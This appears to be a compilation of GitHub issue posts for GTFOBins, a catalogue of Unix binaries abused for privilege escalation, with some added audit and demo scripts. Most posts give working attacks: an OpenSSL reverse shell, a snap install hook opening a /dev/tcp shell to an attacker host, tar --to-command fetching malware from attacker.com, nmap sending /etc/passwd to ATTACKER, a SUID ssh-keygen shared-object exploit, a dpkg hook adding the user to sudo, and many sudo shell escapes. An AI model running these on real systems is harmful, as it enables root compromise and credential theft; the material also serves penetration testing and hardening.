GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
Find the project at https://gtfobins.github.io
Home Page: https://gtfobins.github.io
License: GNU General Public License v3.0
It's the same if it's suid, but it's not by default anywhere I can think of.
sudo ispell <file with misspelled words according to dictionary>
!sh
Caveat: if not specified, it ships with English dictionaries (I believe both GB and US), but various distributions may package it with appropriate dictionaries if the system is configured correctly.
I don't come across it as much as aspell, but I come across it plenty.
https://www.cs.hmc.edu/~geoff/ispell.html
https://www.gnu.org/software/ispell/
Terminal: termite V15
Ncat version: 7.80
OpenSSL version: OpenSSL 1.1.1e 17 Mar 2020
OS: Arch Linux
Kernel: 5.5.10.a-1-hardened
Hi guys!
I had a lot of issues with the OpenSSL reverse shell. Like disconnections, latency etc... I found out after some tests that the flag -no_ign_eof is causing issues when you upgrade your shell to a fully interactive tty.
Example with screens:
Attacker box:
ncat --ssl -lnvp 4444
or
openssl s_server -quiet -cert /tmp/cert.pem -key /tmp/key.pem -port 4444
Victim box:
rm /tmp/s; mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect localhost:4444 > /tmp/s; rm /tmp/s
I then initiate the procedure to upgrade to a fully interactive tty shell
SHELL=/bin/bash script -q /dev/null
CTRL+Z
stty raw -echo
fg
reset
Then at this point, if I do an uppercase "R": it crashes my reverse shell with the following information:
RENEGOTIATING
119157357475136:error:1420410A:SSL routines:SSL_renegotiate:wrong ssl version:ssl/ssl_lib.c:2127:
UPDATE: it's the same with a lowercase "k": it crashes but with the "KEYUPDATE" reason.
If I remove the -no_ign_eof, I do not have any problem with the reverse shell and I can do an uppercase "R" when upgrading my OpenSSL reverse shell without connection crash/disconnection.
My question is:
Is this argument really necessary? I did not encounter any problem while not using it tho it may need more testing. Are you able to reproduce this on your side?
Regards
Seems like /usr/bin/bundle and /usr/bin/bundler are both installed with the bundler gem.
They were different once, but are now identical except for name:
Currently only the CAP_SETUID capability is supported. I propose we expand the category to support other exploitable capability types, such as CAP_SYS_PTRACE. As long as the capability provides some sort of shell, arb read, arb write etc primitive, it should be valid to go in GTFOBins.
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.
https://inventory.rawsec.ml/resources.html#GTFOBins
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.
The badge shows to your community that you are inventoried. This also shows you care about your project and want it growing, that your tool is not abandonware.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges; it looks like this, but there are several styles available.
If you want to thank us, you can help make the project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care.
Hi,
Would you be interested in a way to exploit this kind of sudo rules?
%grp ALL=(ALL:ALL) /usr/bin/apt-get install *
%grp ALL=(ALL:ALL) /usr/bin/apt-get remove *
I see you already have it for apt-get, but sometimes sysadmins will only allow subcommands of apt, thinking that they are safe this way.
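An added example, not part of the issue above or of GTFOBins itself: the check an auditor would want for exactly this kind of rule. The function reads `sudo -l` output and flags rules whose allowed subcommand is still escapable. The `sudo -l` text is constructed, and the list of escapable subcommands is my assumption based on the GTFOBins apt-get and snap pages and the snap post later on this page; extend it with whatever GTFOBins lists for the binaries on your host.

```shell
#!/bin/sh
# Added example (not GTFOBins code): flag sudoers rules of the form
# "/usr/bin/apt-get install *" whose subcommand still yields a shell.

# Constructed sample of `sudo -l` output (not from a real host).
SAMPLE_SUDO_L='User grp may run the following commands on host:
    (ALL : ALL) /usr/bin/apt-get install *
    (ALL : ALL) /usr/bin/apt-get remove *
    (root) NOPASSWD: /usr/bin/snap install *
    (root) NOPASSWD: /usr/bin/systemctl status nginx
    (ALL) /usr/bin/apt-get update'

# Assumed list: "binary subcommand needs_wildcard". install/remove/update
# need extra arguments (-o/-c config injection), so the rule must end in "*";
# changelog drops into a pager, so it is escapable even without a wildcard.
ESCAPABLE='apt-get install yes
apt-get remove yes
apt-get update yes
apt-get changelog no
snap install yes'

# Read sudo -l text on stdin, print every rule that matches ESCAPABLE.
# Tags other than NOPASSWD (SETENV:, LOG_INPUT: ...) are not handled here.
audit_sudo_rules() {
    set -f                      # keep the literal '*' from globbing below
    while IFS= read -r line; do
        # only lines carrying a command spec: "(runas) [NOPASSWD:] /path ..."
        case "$line" in *'('*')'*/*) ;; *) continue ;; esac
        spec=${line#*\)}                    # strip "(runas)"
        spec=${spec#*NOPASSWD:}             # strip the optional tag
        set -- $spec
        bin=${1##*/} sub=${2:-}
        needs_wild=$(printf '%s\n' "$ESCAPABLE" |
            awk -v b="$bin" -v s="$sub" '$1==b && $2==s {print $3; exit}')
        [ -n "$needs_wild" ] || continue
        case "$needs_wild:$spec" in
            no:*|yes:*'*'*) printf '%s\n' "$line" ;;
        esac
    done
    set +f
}

# Live use:  sudo -l | audit_sudo_rules
printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_rules
```

On the constructed sample this prints the two apt-get wildcard rules and the snap install rule, and stays quiet about `apt-get update` without a wildcard and about systemctl.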
Is there a license for using this?
I have an idea for a project and want to make sure I'm not going to be breaking any license.
I keep getting an error page after it loads for some time.
Note that in bash (but not in Bourne shell) you can use <<< (here-string) to put a string in the standard input, instead of echo and pipe. So a file-write operation with tee would be:
./tee -a "$LFILE" <<< 'data'
instead of
echo data | ./tee -a "$LFILE"
This is not specific to tee, but relevant to all uses of echo in this repo. Not sure where is the correct place to mention this.
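An added example, not from the GTFOBins page or the comment above, showing why the here-string matters for the file-write entries: echo treats a leading `-n`/`-e` as an option and, in Bourne-style shells, interprets backslash escapes, so the bytes that land in the file are not the bytes you passed. The here-string is bash-only, so it is wrapped in `bash -c` here; `printf '%s\n'` is the portable alternative. The payload strings are constructed.

```shell
#!/bin/sh
# Added example (not GTFOBins code): three ways to push data into
# `tee -a "$LFILE"` and what each one actually writes.

# Form used on the GTFOBins pages: echo parses "-n"/"-e" as options
# and (in dash/Bourne shells) expands backslash escapes in the data.
write_echo() {
    echo "$2" | tee -a "$1" > /dev/null
}

# bash here-string: data reaches stdin untouched. Run through bash -c so
# the demo also works when this file is executed by sh (no here-strings).
write_herestring() {
    bash -c 'tee -a "$1" <<< "$2" > /dev/null' _ "$1" "$2"
}

# Portable form for Bourne shell/dash: printf with an explicit format string.
write_printf() {
    printf '%s\n' "$2" | tee -a "$1" > /dev/null
}

# What actually landed on disk.
read_back() { cat "$1"; }

# Side-by-side run over payloads that trip up echo.
demo() {
    dir=$(mktemp -d)
    for p in '-n' '-e' 'line1\nline2'; do
        write_echo "$dir/echo" "$p"
        write_herestring "$dir/here" "$p"
        write_printf "$dir/printf" "$p"
        printf 'payload %-14s echo=%-14s herestring=%-14s printf=%s\n' \
            "[$p]" "[$(read_back "$dir/echo")]" \
            "[$(read_back "$dir/here")]" "[$(read_back "$dir/printf")]"
        rm -f "$dir/echo" "$dir/here" "$dir/printf"
    done
    rmdir "$dir"
}
demo
```

With `-n` the echo form writes an empty file in both bash and dash; the here-string and printf forms write the literal `-n`. The `-e` and `line1\nline2` rows differ between shells, which is exactly the portability problem the comment points at.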
It would be interesting to add a second line assigning permissions to the user you would like to escalate to, since npm needs write permission on the folder you create.
TF=$(mktemp -d)
chmod 777 $TF
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo -u serv-manage npm -C $TF --unsafe-perm i
Thanks.
While doing the challenges for the first module of pwn.college I found a way to read files with an SUID version of gcc.
Following the format of other examples, this is how to reproduce:
sudo sh -c 'cp $(which gcc) .; chmod +s ./gcc'
LFILE=file_to_read
./gcc -x c "$LFILE"
Assuming the privileged file is not valid C code, much if not all of its lines should be output within syntax error messages.
Is this the kind of example that would be worth adding?
Hello!
I noticed in https://gtfobins.github.io, there isn't anything mentioned for ways to GTFO of snap ... "i.e. snap install".
There was a recent CTF machine where this was a way to get root taking advantage of the sudo permissions:
(root) NOPASSWD: /usr/bin/snap install *
Here are some references on how to exploit this:
https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py
Here is a script I wrote using the following references and updated to reflect my environment:
Note: My firewall was affecting the build process, so I temporarily disable it in this script.
./buildSnap.sh
## Install necessary tools
sudo snap install snapcraft --classic
## Disable firewall
sudo ufw disable
## Make an empty directory to work with
cd ~/Documents
mkdir revshell_snap
cd revshell_snap
## Initialize the directory as a snap project
snapcraft init
## Set up the install hook
mkdir snap/hooks
touch snap/hooks/install
chmod a+x snap/hooks/install
## Write the script we want to execute as root
cat > snap/hooks/install << "EOF"
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/attackerip/attackerport 0>&1'
EOF
## Configure the snap yaml file
cat > snap/snapcraft.yaml << "EOF"
name: revshell
base: core
version: '1.0'
summary: Runs exploit bash script when installed
description: Runs exploit bash script when installed
grade: devel
confinement: devmode
parts:
  my-part:
    plugin: nil
EOF
## Build the snap
snapcraft
## Re-enable firewall
sudo ufw enable
## Move
mv revshell_1.0_amd64.snap ../revshell.snap
Then you would install the snap and it would run the install hook script when it installs ...
sudo snap install revshell.snap --dangerous --devmode
Let me know if this is something worth adding to the GTFOBins repository going forward!
Thanks!
Hi
Before submitting a PR I would like to hear your opinion.
Would it make sense to create a new function for wildcard / parameter injection possibilities?
This function would address all binaries which could be used to execute a function via a command line argument.
A well-known example is the tar command and the arguments --checkpoint-action=exec="chmod +s `which dash`" --checkpoint=1
as e.g. documented here: https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/
I'm aware that this command execution method is already documented in GTFOBins, but it cannot be identified as wildcard or parameter injection. A new category would make sense for me to quickly identify binaries which can be abused for privesc if one or more parameters can be controlled.
What do you think?
THX
Hi,
I just want to know if I understand the information here correctly.
Supposedly for cat, a File read means that it will read data outside a restricted file system.
I tried to run this in Ubuntu.
LFILE=/root/my_file.txt
cat "$LFILE"
However it still gave me "Permission denied"
Is there a limitation for this to work?
Thanks.
The option --use-askpass doesn't work anymore in the newer version of wget.
We can use a solution described here:
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-wget-privilege-escalation/#4.-transfer-the-content-of-the-shadow-file
that is still present in wget: make use of the file upload and file download sections.
If there is instead a better option that does not waste shadow files, that would be great.
--to-command=COMMAND
pipe extracted files to another program
For example:
echo -e '#!/bin/bash\n\nwget http://attacker.com/malicious.elf' > script.sh
tar -cvf script.tar script.sh
sudo tar -xvf script.tar --to-command /bin/bash
Source: https://0xdf.gitlab.io/2018/10/20/htb-tartarsauce.html
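An added example, not from the GTFOBins page or either of the two posts, that runs both tar vectors discussed above (the wildcard/checkpoint injection a few posts up and `--to-command` just above) as an unprivileged user so you can see the mechanics before pointing them at a root cron job or a sudo rule. Marker files stand in for the `chmod +s` / reverse-shell payloads; all paths are temporary directories created by the script, and GNU tar is assumed.

```shell
#!/bin/sh
# Added example (not GTFOBins code): two argument-injection paths into tar.

# 1. Wildcard injection. A privileged job runs `tar cf backup.tar *` inside
#    a directory we can write to; the file *names* become tar options.
wildcard_injection() {
    work=$(mktemp -d)
    marker="$work/marker"
    target="$work/shared"           # constructed stand-in for the backed-up dir
    mkdir "$target"
    echo "real data" > "$target/notes.txt"
    # payload, plus two files named after the options we want tar to parse
    printf '#!/bin/sh\necho pwned-by-checkpoint > %s\n' "$marker" > "$target/shell.sh"
    chmod +x "$target/shell.sh"
    touch "$target/--checkpoint=1"
    touch "$target/--checkpoint-action=exec=sh shell.sh"
    # the "cron job": unquoted glob, so tar sees the option-shaped names
    (cd "$target" && tar cf "$work/backup.tar" * 2>/dev/null)
    cat "$marker" 2>/dev/null       # empty if the injection did not fire
    rm -rf "$work"
}

# 2. --to-command. Each extracted file is piped to the command's stdin; with
#    `sudo tar -xf ... --to-command=/bin/sh` the script runs as root. No sudo
#    here, so it reports whoever runs the demo.
to_command() {
    work=$(mktemp -d)
    printf 'echo to-command-ran-as-$(id -un) from $TAR_FILENAME\n' > "$work/script.sh"
    (cd "$work" && tar cf script.tar script.sh)
    out=$(cd "$work" && tar xf script.tar --to-command=/bin/sh)
    rm -rf "$work"
    printf '%s\n' "$out"
}

wildcard_injection
to_command
```

The fix on the defending side is to stop the glob from producing option-shaped names: `tar cf backup.tar -- *` or `tar cf backup.tar ./*`, and never let an untrusted user control the arguments of a tar that runs as root.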
Hello, the given File Read command didn't really work for me, but I found another way to read the file:
genisoimage -sort "$LFILE"
https://gtfobins.github.io/gtfobins/genisoimage/
genisoimage -sort /flag
If the wireshark gui loads the Lua plugin then it is possible to execute any Lua code.
Tools -> Lua -> Evaluate:
os.execute("xterm")
I might be wrong, but I think this commit is accidental, and bash wasn't supposed to be removed.
If thats the case, happy to send a PR.
ssh, nc/ncat/socat/openssl, bash /dev/tcp redirects, et al. can be used to forward ports to access more systems.
If you have a 3-machine ssh chain, say A->B->C, where B->C is a forced ssh command, then unless the forced command includes -e none, you can interact with this second client using ~~C (a tilde per ssh client in the chain) to add -L, -R, and -D forwards. It is common for servers with forced commands to block port forwarding, but easy to not know about the escape sequence which effectively re-enables them under this (rare) configuration.
For the following binary, https://gtfobins.github.io/gtfobins/ssh-keygen/, the instructions stated in the document are not enough. I would like to add more info, like generating a valid shared object file. How can I add it? If I add it to the description, it may overwrite the default description. Otherwise I have to add it as a function, but currently I don't see any suitable function for it. Can you add a suitable function for that, or can you guide me on whether it's possible to add examples?
If the author doesn't respond, or for anyone looking for the answer for the ssh-keygen binary, this is how you can generate a valid shared object file. This is most useful when the ssh-keygen binary has the suid bit:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

/* ssh-keygen -D loads the library as a PKCS#11 provider and resolves
 * C_GetFunctionList from it, so the body runs with the SUID privileges. */
int C_GetFunctionList(){
    setuid(geteuid());   /* make the real uid match the SUID effective uid */
    system("id");        /* Your command */
    printf("\n");        /* New line is important */
    return 1;            /* ssh-keygen will then report an error, after the command has run */
}
Save above file as lib.c
and compile using below command:
gcc -shared -o lib.so -fPIC lib.c
Then execute:
ssh-keygen -D ./lib.so
Some versions of Snap will not try to install a package with a single character as its name. Snap's GTFOBin can be made more widely usable by changing
fpm -n x -s dir -t snap -a all meta
to something like
fpm -n test -s dir -t snap -a all meta
and likewise
sudo snap install x_1.0_all.snap --dangerous --devmode
to
sudo snap install test_1.0_all.snap --dangerous --devmode
Without this change, snap will error out with
error: cannot read snap file: invalid snap name: "x"
and not execute the given command.
From fallofsudo:
sudo dmesg --human
!/bin/bash
I uploaded your code on hacksudo.github.io but am unable to get search results; the issue is:
Binary | Functions
---|---
No binary matches... |
Good day,
https://manpages.debian.org/stretch/procps/top.1.en.html#6c._ADDING_INSPECT_Entries
https://gitlab.com/procps-ng/procps/blob/master/top/top.c#L2996
It's a bit of a pain, since it requires an arbitrary append to ~/.toprc to add a custom inspect entry, and it's really picky about this file format. Example: choose W to write a default ~/.toprc, then append:
...
pipe^IRun arbitrary code as root^Iid
Then run top and choose Y to inspect a process, and choose your custom inspect entry:
Inspection View at pid: 3986, running myprocess. Locating: N/A
Use: left/right/up/down/etc to navigate the output; 'L'/'&' to locate/next.
Or: <Enter> to select another; 'q' or <Esc> to end !
Run arbitrary code as root: 1-1 lines, 1-121 columns, 77 bytes read
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
Is this worth writing up in a pull request? It might be a while before I get to it. If someone else wants the glory, it's cool with me. 😁
Hello.
Sorry, I don't have enough time to create a pull request.
I want to suggest a few tricks that helped me with exploiting "https://bitbucket.org/xael/python-nmap/issues/51/security-issue-nmap-parameter-injection" without direct access to the file system.
nc -nv -lp 80
nmap ATTACKER --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'
php -S 0.0.0.0:80 -t . router_with_directory_listing.php
nmap ATTACKER -sV --script http-fetch --script-args 'destination=/tmp/'
There are a lot of things listed here that are examples of "use of privileges results in use of privileges". As an example, your listing for cat includes:
File read -
"It reads data from files," - It sure does!
"it may be used to do privileged reads" - Iff the parent process is privileged, in which case, the cat (no pun intended) is out of the bag.
"or disclose files outside a restricted file system." - What does that even mean?
This applies to all instances of "File read", not just cat.
SUID -
"It runs with the SUID bit set" - Not on my box. Not on anybody's box (within experimental error).
"This example creates a local SUID copy of the binary and runs it to maintain elevated privileges." - If you have the capability to add SUID to cat, you don't need to add SUID to cat.
This applies to all instances of "SUID", not just cat.
Sudo -
"It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo." - That's literally what sudo is designed to do. Running sudo results in elevated privileges, by design.
This applies to all instances of "Sudo", not just cat.
When: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash to get root
screen -x root/root
Run it and you'll be root if the binary is SUID.
First of all thanks for this interesting project.
I've already made a post on (sorry for the cross-post)
https://security.stackexchange.com/questions/197900/command-line-tools-exploitable-on-linux
but I've decided to post here too because I'm interested in your opinion.
As said in the post above, why do you consider mv (it is only an example) as a dangerous command line tool?
Ok, I can write to an un-permitted file if the SUID bit is set, but:
- the SUID bit can be potentially dangerous
- mv with the SUID bit set in any distribution
Why have you "blacklisted" this command?
I've the same doubts on other commands.
Especially if it’s a CI-generated script.
I’m very curious about the various machines I use and whether they are vulnerable to non-privileged users running these commands.
Would love a pass/fail that takes a filename as a param for those tests that attempt to read files.
The SUID and SGID binaries found on the Linux machine are saved to a file.
In this way, the data captured below can be compared with the two files.
curl https://gtfobins.github.io | grep '<li><a href="/gtfobins/' | grep "#suid" | cut -d / -f 3
I have this script that works this way. But it doesn't work very well.
https://github.com/ihack4falafel/OSCP/blob/master/BASH/SUIDChecker.sh
Do you have any idea about it?
Have a good day.
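An added example, not from the post above or from GTFOBins, of the two checks asked for in this thread: matching the setuid/setgid binaries found on a host against the GTFOBins SUID names, and a pass/fail harness for File-read entries that takes a filename as a parameter. The GTFOBins name list below is a constructed sample; in practice feed it from the `curl | grep | cut` pipeline in the post. The read check compares against content you planted yourself (for instance a root-only canary file in a lab VM), since the unprivileged user cannot read the reference otherwise.

```shell
#!/bin/sh
# Added example (not GTFOBins code): SUID/SGID inventory matched against
# GTFOBins names, plus a pass/fail check for File-read primitives.

# Constructed sample of names from the GTFOBins SUID section.
GTFOBINS_SUID_SAMPLE='bash
cp
env
find
python3
vim'

# Basenames of setuid or setgid regular files under the given root
# (default /), one per line, sorted, ready for match_gtfobins.
find_suid_sgid() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null \
        | sed 's|.*/||' | sort -u
}

# Print names present in both lists.
#   $1: GTFOBins names (newline-separated)   $2: names found on the host
# Exit status is grep's: non-zero when nothing matched.
match_gtfobins() {
    gtfo=$(mktemp)
    printf '%s\n' "$1" | sort -u > "$gtfo"
    printf '%s\n' "$2" | sort -u | grep -Fx -f "$gtfo"
    status=$?
    rm -f "$gtfo"
    return $status
}

# Pass/fail for a File-read entry.
#   $1: shell snippet that reads "$LFILE" (copy it from the GTFOBins page)
#   $2: file to read   $3: the content you planted in that file
check_file_read() {
    cmd=$1 file=$2 expected=$3
    got=$(LFILE=$file sh -c "$cmd" 2>/dev/null)
    if [ "$got" = "$expected" ]; then
        printf 'PASS %s\n' "$cmd"
    else
        printf 'FAIL %s\n' "$cmd"
        return 1
    fi
}

# Live use on a host:
#   match_gtfobins "$GTFOBINS_SUID_SAMPLE" "$(find_suid_sgid /)"
#   check_file_read 'cat "$LFILE"' /root/canary 'canary-1234'
```

Plant the canary as root before testing (`echo canary-1234 > /root/canary; chmod 600 /root/canary`), then run `check_file_read` as the unprivileged user with the SUID or sudo variant of each GTFOBins read command: a PASS means that primitive really crosses the permission boundary on this host, which answers the "Permission denied" question asked earlier on this page.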
Hi!
The section about SUID only mentions this option:
./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
This can be added:
./vim -c ':set shell=/bin/sh\ -p|shell'
The benefit is that this doesn't require python support.
Sorry for opening an issue and not doing a PR but I don't have lot of time, you will do it faster than me.
These new ways are from the FallofSudo project.
Here are some other tools:
Connect to a valid SMB or CIFS share:
sudo smbclient '\\ip\share' -U username
smb: \> !/bin/bash
mysql
sudo mysql -e '\! /bin/bash'
apt-get
sudo apt-get changelog bash
!/bin/bash
Just came across this technique on a Hack The Box machine. I guess it would be good to have it as a technique in GTFOBins.
Some sources: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
I just recently used 7zr on Linux as a way of adding a python file to an archive and then extracting it into a root owned directory as an unprivileged user.
We should add this as another method when sudo privileges are set on 7zr.
If ldconfig binary is suid, it would be possible to change library path loaded by other binaries in order to hijack libs.
I don't know how to create a good example to add it to the list but I think it should be added.
Here are 2 different examples:
Thanks
Reading text file in NodeJS:
require('fs').readFile('/path/to/file', {encoding: 'utf-8'}, function(err, data) {
console.log(data);
});
The reason I ask is because of this tool repository that I created a while back: syscaller
Currently all file writes are kept in the single category File Write.
However not all file writes are equal. Some, such as cp, dd, and mv, give you full control over the content of the file to be written, which is a powerful primitive and highly exploitable.
Whereas some, such as nmap #153, by the author's own definition "I've yet to come up with a way to overwrite the contents of the system file according to what we want,"
I propose the creation of a Limited File Write category, that allows us to more effectively categorize file writes into bins that either
I'd be happy to help categorize should this go ahead.
dpkg -i -o DPkg::Pre-Install-Pkgs::="usermod -a -G sudo $(whoami)" any_package.deb
Hey there. I was doing a CTF and didn't see a cap_chown related capability in Ruby.
I thought it would be great to add the following to the Ruby CAPABILITIES section.
echo "File.chown(id,nil,'/file/to/chown')" > chown.rb
chmod +x chown.rb
ruby chown.rb
Example:
echo "File.chown(1003,nil,'/etc/shadow')" > chown.rb
Hey! Could we colorize the vuln tags, so that it is easy to see the most dangerous programs at a glance?
Hi,
Not tested but should work.
Create a deb using fpm:
fpm -s dir -t deb --name sploit --package exploit.deb --before-install BS_package/foo.sh BS_package/
Load our deb with dpkg
sudo dpkg -i exploit.deb
Have a nice day